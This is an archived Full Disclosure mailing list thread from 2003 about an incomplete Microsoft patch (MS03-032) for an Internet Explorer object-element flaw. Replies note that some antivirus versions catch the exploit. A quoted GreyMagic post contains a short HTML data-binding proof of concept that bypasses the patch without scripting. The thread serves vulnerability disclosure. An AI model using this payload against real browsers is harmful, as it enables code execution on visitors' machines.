Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

RE: RE: BAD NEWS: Microsoft Security Bulletin M S03-032

From: "Bergeron, Jared" <jared.bergeron () office xerox com>
Date: Mon, 8 Sep 2003 17:10:00 -0700
In our testing we found that Virusscan 7 caught this, however Virusscan 4.5x with the latest DAT did not.  


Regards,
---------------------
Jared Bergeron
Systems Analyst / XOG E-Security



-----Original Message-----
From: ADBecker () chmortgage com [mailto:ADBecker () chmortgage com] 
Sent: Monday, September 08, 2003 12:17 PM
To: GreyMagic Software
Cc: Bugtraq; full-disclosure () lists netsys com; http-equiv () excite com; NTBugtraq; Microsoft Security Response 
Center; vulnwatch () vulnwatch org
Subject: [Full-disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032






Updated antivirus software should catch this exploit and prevent any application from being launched.
We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/

Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383


                                                                                                                        
               
                      "GreyMagic                                                                                        
               
                      Software"                To:       "NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq"   
                  
                      <security@greymag         <bugtraq () securityfocus com>, <full-disclosure () lists netsys com>,  
                     
                      ic.com>                   <vulnwatch () vulnwatch org>                                            
                  
                                               cc:       <http-equiv () excite com>, "Microsoft Security Response 
Center"                 
                      09/08/03 07:52 AM         <secure () microsoft com>, (bcc: Andrew D Becker/Continental Homes)     
                  
                                               Subject:  RE: BAD NEWS: Microsoft Security Bulletin MS03-032             
               
                                                                                                                        
               





The patch for Drew's object data=funky.hta doesn't work:


This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft 
again patches the object element in HTML, but it doesn't patch the dynamic version of that same element.


1. Disable Active Scripting


This actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: